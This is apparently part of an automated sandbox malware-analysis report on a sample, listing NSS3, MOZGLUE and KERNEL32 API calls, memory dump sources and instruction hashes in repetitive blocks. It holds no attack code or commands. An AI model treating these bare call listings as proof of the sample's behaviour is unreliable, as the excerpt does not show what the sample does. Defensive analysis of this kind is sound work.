                                                                                                                                                                                                                              • Part of subcall function 6CBC1200: free.MOZGLUE(00000000,?,00000000,00000000), ref: 6CBC1280
                                                                                                                                                                                                                              • Part of subcall function 6CBC1200: PR_Unlock.NSS3(00000000,?,?,00000000,00000000), ref: 6CBC128E
                                                                                                                                                                                                                              • Part of subcall function 6CBC1200: DeleteCriticalSection.KERNEL32(0000001C,?,?,?,00000000,00000000), ref: 6CBC129A
                                                                                                                                                                                                                              • Part of subcall function 6CBC1200: free.MOZGLUE(00000000,?,?,?,00000000,00000000), ref: 6CBC12A1
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000002.00000002.2720558562.000000006CAE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CAE0000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720534101.000000006CAE0000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720711894.000000006CC7F000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720756767.000000006CCBE000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720774330.000000006CCBF000.00000008.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720791907.000000006CCC0000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720812780.000000006CCC5000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_6cae0000_UMrFwHyjUi.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: ArenaUtil$CriticalSection$Arena_EnterFreePoolUnlockValuefree$Alloc_CallClearDeleteMark_Once
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 1441289343-0
                                                                                                                                                                                                                            • Opcode ID: f90256335fee6aeeaa24d2f6bee3f354c0acb0369ebf8db753efb3bf32d612af
                                                                                                                                                                                                                            • Instruction ID: 633dc6f9f4a6d8ba95c7c119a4f5d328ad03c3bcdbeebd3367dd699adca0c9a5
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: f90256335fee6aeeaa24d2f6bee3f354c0acb0369ebf8db753efb3bf32d612af
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 8421D7B5E103C64BE700CF549D447AA3764AF9130CF160269DD08AB742F7B1E9948293
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • CERT_NewCertList.NSS3 ref: 6CB8ACC2
                                                                                                                                                                                                                              • Part of subcall function 6CB62F00: PORT_NewArena_Util.NSS3(00000800), ref: 6CB62F0A
                                                                                                                                                                                                                              • Part of subcall function 6CB62F00: PORT_ArenaAlloc_Util.NSS3(00000000,0000000C), ref: 6CB62F1D
                                                                                                                                                                                                                              • Part of subcall function 6CB62AE0: PORT_Strdup_Util.NSS3(?,?,?,?,?,6CB60A1B,00000000), ref: 6CB62AF0
                                                                                                                                                                                                                              • Part of subcall function 6CB62AE0: tolower.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6CB62B11
                                                                                                                                                                                                                            • CERT_DestroyCertList.NSS3(00000000), ref: 6CB8AD5E
                                                                                                                                                                                                                              • Part of subcall function 6CBA57D0: PK11_GetAllTokens.NSS3(000000FF,00000000,00000000,6CB6B41E,00000000,00000000,?,00000000,?,6CB6B41E,00000000,00000000,00000001,?), ref: 6CBA57E0
                                                                                                                                                                                                                              • Part of subcall function 6CBA57D0: free.MOZGLUE(00000000,00000000,00000000,00000001,?), ref: 6CBA5843
                                                                                                                                                                                                                            • CERT_DestroyCertList.NSS3(?), ref: 6CB8AD36
                                                                                                                                                                                                                              • Part of subcall function 6CB62F50: CERT_DestroyCertificate.NSS3(?), ref: 6CB62F65
                                                                                                                                                                                                                              • Part of subcall function 6CB62F50: PORT_FreeArena_Util.NSS3(?,00000000), ref: 6CB62F83
                                                                                                                                                                                                                            • free.MOZGLUE(?), ref: 6CB8AD4F
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Util$CertDestroyList$Arena_free$Alloc_ArenaCertificateFreeK11_Strdup_Tokenstolower
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 132756963-0
                                                                                                                                                                                                                            • Opcode ID: 19380ce2bd9b63ce9787ba4cd01c53f8b7a752faa7614d681a862e74a5cd3b78
                                                                                                                                                                                                                            • Instruction ID: cd4aba03593e456cf25b62aaa5aeedc126372f88f2e589dc3ed189b1be978cbc
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 19380ce2bd9b63ce9787ba4cd01c53f8b7a752faa7614d681a862e74a5cd3b78
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: D321E4B1D022548BEF10DFA5D8059EEB7B4EF15618F054068D805BBB41FB31AA49CFE6
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • TlsGetValue.KERNEL32 ref: 6CBB3C9E
                                                                                                                                                                                                                            • EnterCriticalSection.KERNEL32(?), ref: 6CBB3CAE
                                                                                                                                                                                                                            • PR_Unlock.NSS3(?), ref: 6CBB3CEA
                                                                                                                                                                                                                            • PR_SetError.NSS3(00000000,00000000), ref: 6CBB3D02
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: CriticalEnterErrorSectionUnlockValue
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 284873373-0
                                                                                                                                                                                                                            • Opcode ID: f2ac05faead228f0b445627b7732d1ae185cae1f3d39a732056caf3c6c4d1fe4
                                                                                                                                                                                                                            • Instruction ID: 54e4020e79abbe57dabe8a7c2167be05b99be3fe390d5075f8421f6076cf0897
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: f2ac05faead228f0b445627b7732d1ae185cae1f3d39a732056caf3c6c4d1fe4
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 0411D675A00254AFD700DF64DC44EAA3778EF09368F154060EC0897712EB31ED54C7E1
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • PORT_NewArena_Util.NSS3(00000800,?,00000001,?,6CBBF0AD,6CBBF150,?,6CBBF150,?,?,?), ref: 6CBBECBA
                                                                                                                                                                                                                              • Part of subcall function 6CBC0FF0: calloc.MOZGLUE(00000001,00000024,00000000,?,?,6CB687ED,00000800,6CB5EF74,00000000), ref: 6CBC1000
                                                                                                                                                                                                                              • Part of subcall function 6CBC0FF0: PR_NewLock.NSS3(?,00000800,6CB5EF74,00000000), ref: 6CBC1016
                                                                                                                                                                                                                              • Part of subcall function 6CBC0FF0: PL_InitArenaPool.NSS3(00000000,security,6CB687ED,00000008,?,00000800,6CB5EF74,00000000), ref: 6CBC102B
                                                                                                                                                                                                                            • PORT_ArenaAlloc_Util.NSS3(00000000,00000028,?,?,?), ref: 6CBBECD1
                                                                                                                                                                                                                              • Part of subcall function 6CBC10C0: TlsGetValue.KERNEL32(?,6CB68802,00000000,00000008,?,6CB5EF74,00000000), ref: 6CBC10F3
                                                                                                                                                                                                                              • Part of subcall function 6CBC10C0: EnterCriticalSection.KERNEL32(?,?,6CB68802,00000000,00000008,?,6CB5EF74,00000000), ref: 6CBC110C
                                                                                                                                                                                                                              • Part of subcall function 6CBC10C0: PL_ArenaAllocate.NSS3(?,?,?,6CB68802,00000000,00000008,?,6CB5EF74,00000000), ref: 6CBC1141
                                                                                                                                                                                                                              • Part of subcall function 6CBC10C0: PR_Unlock.NSS3(?,?,?,6CB68802,00000000,00000008,?,6CB5EF74,00000000), ref: 6CBC1182
                                                                                                                                                                                                                              • Part of subcall function 6CBC10C0: TlsGetValue.KERNEL32(?,6CB68802,00000000,00000008,?,6CB5EF74,00000000), ref: 6CBC119C
                                                                                                                                                                                                                            • PORT_ArenaAlloc_Util.NSS3(00000000,0000003C,?,?,?,?,?), ref: 6CBBED02
                                                                                                                                                                                                                              • Part of subcall function 6CBC10C0: PL_ArenaAllocate.NSS3(?,6CB68802,00000000,00000008,?,6CB5EF74,00000000), ref: 6CBC116E
                                                                                                                                                                                                                            • PORT_FreeArena_Util.NSS3(00000000,00000000,?,?,?,?,?), ref: 6CBBED5A
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000002.00000002.2720558562.000000006CAE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CAE0000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720534101.000000006CAE0000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720711894.000000006CC7F000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720756767.000000006CCBE000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720774330.000000006CCBF000.00000008.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720791907.000000006CCC0000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720812780.000000006CCC5000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_6cae0000_UMrFwHyjUi.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Arena$Util$Alloc_AllocateArena_Value$CriticalEnterFreeInitLockPoolSectionUnlockcalloc
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 2957673229-0
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • PR_SetError.NSS3(FFFFE013,00000000,00000000,00000000,6CBD7FFA,?,6CBD9767,?,8B7874C0,0000A48E), ref: 6CBEEDD4
                                                                                                                                                                                                                            • realloc.MOZGLUE(C7C1920F,?,00000000,00000000,6CBD7FFA,?,6CBD9767,?,8B7874C0,0000A48E), ref: 6CBEEDFD
                                                                                                                                                                                                                            • PORT_Alloc_Util.NSS3(?,00000000,00000000,6CBD7FFA,?,6CBD9767,?,8B7874C0,0000A48E), ref: 6CBEEE14
                                                                                                                                                                                                                              • Part of subcall function 6CBC0BE0: malloc.MOZGLUE(6CBB8D2D,?,00000000,?), ref: 6CBC0BF8
                                                                                                                                                                                                                              • Part of subcall function 6CBC0BE0: TlsGetValue.KERNEL32(6CBB8D2D,?,00000000,?), ref: 6CBC0C15
                                                                                                                                                                                                                            • memcpy.VCRUNTIME140(?,?,6CBD9767,00000000,00000000,6CBD7FFA,?,6CBD9767,?,8B7874C0,0000A48E), ref: 6CBEEE33
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000002.00000002.2720558562.000000006CAE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CAE0000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720534101.000000006CAE0000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720711894.000000006CC7F000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720756767.000000006CCBE000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720774330.000000006CCBF000.00000008.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720791907.000000006CCC0000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720812780.000000006CCC5000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_6cae0000_UMrFwHyjUi.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Alloc_ErrorUtilValuemallocmemcpyrealloc
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 3903481028-0
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000002.00000002.2720558562.000000006CAE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CAE0000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720534101.000000006CAE0000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720711894.000000006CC7F000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720756767.000000006CCBE000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720774330.000000006CCBF000.00000008.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720791907.000000006CCC0000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720812780.000000006CCC5000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_6cae0000_UMrFwHyjUi.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: CriticalEnterErrorSectionUnlockValue
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 284873373-0
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • PR_DestroyMonitor.NSS3(000A34B6,00000000,00000678,?,6CBF5F17,?,?,?,?,?,?,?,?,6CBFAAD4), ref: 6CC0AC94
                                                                                                                                                                                                                            • PK11_FreeSymKey.NSS3(08C483FF,00000000,00000678,?,6CBF5F17,?,?,?,?,?,?,?,?,6CBFAAD4), ref: 6CC0ACA6
                                                                                                                                                                                                                            • free.MOZGLUE(20868D04,?,?,?,?,?,?,?,?,6CBFAAD4), ref: 6CC0ACC0
                                                                                                                                                                                                                            • free.MOZGLUE(04C48300,?,?,?,?,?,?,?,?,6CBFAAD4), ref: 6CC0ACDB
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000002.00000002.2720558562.000000006CAE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CAE0000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720534101.000000006CAE0000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720711894.000000006CC7F000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720756767.000000006CCBE000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720774330.000000006CCBF000.00000008.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720791907.000000006CCC0000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720812780.000000006CCC5000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_6cae0000_UMrFwHyjUi.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: free$DestroyFreeK11_Monitor
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 3989322779-0
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • CERT_DestroyCertificate.NSS3(?), ref: 6CB71DFB
                                                                                                                                                                                                                              • Part of subcall function 6CB695B0: TlsGetValue.KERNEL32(00000000,?,6CB800D2,00000000), ref: 6CB695D2
                                                                                                                                                                                                                              • Part of subcall function 6CB695B0: EnterCriticalSection.KERNEL32(?,?,?,6CB800D2,00000000), ref: 6CB695E7
                                                                                                                                                                                                                              • Part of subcall function 6CB695B0: PR_Unlock.NSS3(?,?,?,?,6CB800D2,00000000), ref: 6CB69605
                                                                                                                                                                                                                            • PR_EnterMonitor.NSS3 ref: 6CB71E09
                                                                                                                                                                                                                              • Part of subcall function 6CC29090: TlsGetValue.KERNEL32 ref: 6CC290AB
                                                                                                                                                                                                                              • Part of subcall function 6CC29090: TlsGetValue.KERNEL32 ref: 6CC290C9
                                                                                                                                                                                                                              • Part of subcall function 6CC29090: EnterCriticalSection.KERNEL32 ref: 6CC290E5
                                                                                                                                                                                                                              • Part of subcall function 6CC29090: TlsGetValue.KERNEL32 ref: 6CC29116
                                                                                                                                                                                                                              • Part of subcall function 6CC29090: LeaveCriticalSection.KERNEL32 ref: 6CC2913F
                                                                                                                                                                                                                              • Part of subcall function 6CB6E190: PR_EnterMonitor.NSS3(?,?,6CB6E175), ref: 6CB6E19C
                                                                                                                                                                                                                              • Part of subcall function 6CB6E190: PR_EnterMonitor.NSS3(6CB6E175), ref: 6CB6E1AA
                                                                                                                                                                                                                              • Part of subcall function 6CB6E190: PR_ExitMonitor.NSS3 ref: 6CB6E208
                                                                                                                                                                                                                              • Part of subcall function 6CB6E190: PL_HashTableRemove.NSS3(?), ref: 6CB6E219
                                                                                                                                                                                                                              • Part of subcall function 6CB6E190: PORT_FreeArena_Util.NSS3(?,00000000), ref: 6CB6E231
                                                                                                                                                                                                                              • Part of subcall function 6CB6E190: PORT_FreeArena_Util.NSS3(?,00000000), ref: 6CB6E249
                                                                                                                                                                                                                              • Part of subcall function 6CB6E190: PR_ExitMonitor.NSS3 ref: 6CB6E257
                                                                                                                                                                                                                            • PR_SetError.NSS3(FFFFE005,00000000), ref: 6CB71E37
                                                                                                                                                                                                                            • PR_ExitMonitor.NSS3 ref: 6CB71E4A
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000002.00000002.2720558562.000000006CAE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CAE0000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720534101.000000006CAE0000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720711894.000000006CC7F000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720756767.000000006CCBE000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720774330.000000006CCBF000.00000008.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720791907.000000006CCC0000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720812780.000000006CCC5000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_6cae0000_UMrFwHyjUi.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Monitor$Enter$Value$CriticalExitSection$Arena_FreeUtil$CertificateDestroyErrorHashLeaveRemoveTableUnlock
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 499896158-0
                                                                                                                                                                                                                            • Opcode ID: c39724b13b1020d56a49022bd38450c62b2cd59ae6d63e8f3b33bdeff18d39c7
                                                                                                                                                                                                                            • Instruction ID: f693f271ecb47a758d6d1d6cc0b20539d5e28832e5b4a0c58986cc8f0d0b4acb
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: c39724b13b1020d56a49022bd38450c62b2cd59ae6d63e8f3b33bdeff18d39c7
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 0B017CB1B4019097EB209B29EC11F4677B4AB41B48F180031ED2C96A91E731E914CBB6
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • PK11_FreeSymKey.NSS3(?,6CBF5D40,00000000,?,?,6CBE6AC6,6CBF639C), ref: 6CC0AC2D
                                                                                                                                                                                                                              • Part of subcall function 6CBAADC0: TlsGetValue.KERNEL32(?,6CB8CDBB,?,6CB8D079,00000000,00000001), ref: 6CBAAE10
                                                                                                                                                                                                                              • Part of subcall function 6CBAADC0: EnterCriticalSection.KERNEL32(?,?,6CB8CDBB,?,6CB8D079,00000000,00000001), ref: 6CBAAE24
                                                                                                                                                                                                                              • Part of subcall function 6CBAADC0: PR_Unlock.NSS3(?,?,?,?,?,?,6CB8D079,00000000,00000001), ref: 6CBAAE5A
                                                                                                                                                                                                                              • Part of subcall function 6CBAADC0: memset.VCRUNTIME140(85145F8B,00000000,8D1474DB,?,6CB8CDBB,?,6CB8D079,00000000,00000001), ref: 6CBAAE6F
                                                                                                                                                                                                                              • Part of subcall function 6CBAADC0: free.MOZGLUE(85145F8B,?,?,?,?,6CB8CDBB,?,6CB8D079,00000000,00000001), ref: 6CBAAE7F
                                                                                                                                                                                                                              • Part of subcall function 6CBAADC0: TlsGetValue.KERNEL32(?,6CB8CDBB,?,6CB8D079,00000000,00000001), ref: 6CBAAEB1
                                                                                                                                                                                                                              • Part of subcall function 6CBAADC0: EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,6CB8CDBB,?,6CB8D079,00000000,00000001), ref: 6CBAAEC9
                                                                                                                                                                                                                            • PK11_FreeSymKey.NSS3(?,6CBF5D40,00000000,?,?,6CBE6AC6,6CBF639C), ref: 6CC0AC44
                                                                                                                                                                                                                            • SECITEM_ZfreeItem_Util.NSS3(8CB6FF15,00000000,6CBF5D40,00000000,?,?,6CBE6AC6,6CBF639C), ref: 6CC0AC59
                                                                                                                                                                                                                            • free.MOZGLUE(8CB6FF01,6CBE6AC6,6CBF639C,?,?,?,?,?,?,?,?,?,6CBF5D40,00000000,?,6CBFAAD4), ref: 6CC0AC62
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000002.00000002.2720558562.000000006CAE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CAE0000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720534101.000000006CAE0000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720711894.000000006CC7F000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720756767.000000006CCBE000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720774330.000000006CCBF000.00000008.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720791907.000000006CCC0000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720812780.000000006CCC5000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_6cae0000_UMrFwHyjUi.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: CriticalEnterFreeK11_SectionValuefree$Item_UnlockUtilZfreememset
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 1595327144-0
                                                                                                                                                                                                                            • Opcode ID: 1376d080c3a2a803248cb8474f939fc0d8af668f8571998b1acb6e81a2a539b3
                                                                                                                                                                                                                            • Instruction ID: b27e6d7f2b31cdc1d47b80b1e0c9e22cc91ed050bcdc249a311029beb2a2693f
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 1376d080c3a2a803248cb8474f939fc0d8af668f8571998b1acb6e81a2a539b3
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 96014FB5A002109FDB00DF65E8C0B5677A8EF44B58F198068E9899F706E732E845CFB1
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • PORT_Alloc_Util.NSS3(0000000C,?,?,00000001,?,6CB69003,?), ref: 6CBBFD91
                                                                                                                                                                                                                              • Part of subcall function 6CBC0BE0: malloc.MOZGLUE(6CBB8D2D,?,00000000,?), ref: 6CBC0BF8
                                                                                                                                                                                                                              • Part of subcall function 6CBC0BE0: TlsGetValue.KERNEL32(6CBB8D2D,?,00000000,?), ref: 6CBC0C15
                                                                                                                                                                                                                            • PORT_Alloc_Util.NSS3(A4686CBC,?), ref: 6CBBFDA2
                                                                                                                                                                                                                            • memcpy.VCRUNTIME140(00000000,12D068C3,A4686CBC,?,?), ref: 6CBBFDC4
                                                                                                                                                                                                                            • free.MOZGLUE(00000000,?,?), ref: 6CBBFDD1
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000002.00000002.2720558562.000000006CAE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CAE0000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720534101.000000006CAE0000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720711894.000000006CC7F000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720756767.000000006CCBE000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720774330.000000006CCBF000.00000008.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720791907.000000006CCC0000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720812780.000000006CCC5000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_6cae0000_UMrFwHyjUi.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Alloc_Util$Valuefreemallocmemcpy
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 2335489644-0
                                                                                                                                                                                                                            • Opcode ID: 44f53ae199ffa5be66bfc2d9776e0b32b5ed118b2ba8baf11a5714017f2f54e4
                                                                                                                                                                                                                            • Instruction ID: 1617eb659e7c0d40a9755970fec25f47e6dd165f4e55dc4ce91fe4a4dafc3f9f
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 44f53ae199ffa5be66bfc2d9776e0b32b5ed118b2ba8baf11a5714017f2f54e4
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: AEF0FCFE6012925BEB004F95EC80937B768EF54299B148034ED199BB01EB71D814C7E3
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000002.00000002.2720558562.000000006CAE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CAE0000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720534101.000000006CAE0000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720711894.000000006CC7F000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720756767.000000006CCBE000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720774330.000000006CCBF000.00000008.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720791907.000000006CCC0000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720812780.000000006CCC5000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_6cae0000_UMrFwHyjUi.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: CriticalDeleteSectionfree
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 2988086103-0
                                                                                                                                                                                                                            • Opcode ID: 8130a3c25930976a18b62c27d0e3dbbe3912aa6b472a0ff20f967dc6b304797d
                                                                                                                                                                                                                            • Instruction ID: 67475be92497bace57bb8777afe2a53dfa5829b74cb33632d7958c778e95a205
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 8130a3c25930976a18b62c27d0e3dbbe3912aa6b472a0ff20f967dc6b304797d
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 81E06DB6700608AFCA10EFA8DC88C8B77BCEE8A2713150525EA91D3700D232F905CBE5
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • sqlite3_value_text.NSS3 ref: 6CB59E1F
                                                                                                                                                                                                                              • Part of subcall function 6CB113C0: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,6CAE2352,?,00000000,?,?), ref: 6CB11413
                                                                                                                                                                                                                              • Part of subcall function 6CB113C0: memcpy.VCRUNTIME140(00000000,6CAE2352,00000002,?,?,?,?,6CAE2352,?,00000000,?,?), ref: 6CB114C0
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            • ESCAPE expression must be a single character, xrefs: 6CB59F78
                                                                                                                                                                                                                            • LIKE or GLOB pattern too complex, xrefs: 6CB5A006
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000002.00000002.2720558562.000000006CAE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CAE0000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720534101.000000006CAE0000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720711894.000000006CC7F000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720756767.000000006CCBE000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720774330.000000006CCBF000.00000008.00000001.01000000.00000008.sdmp
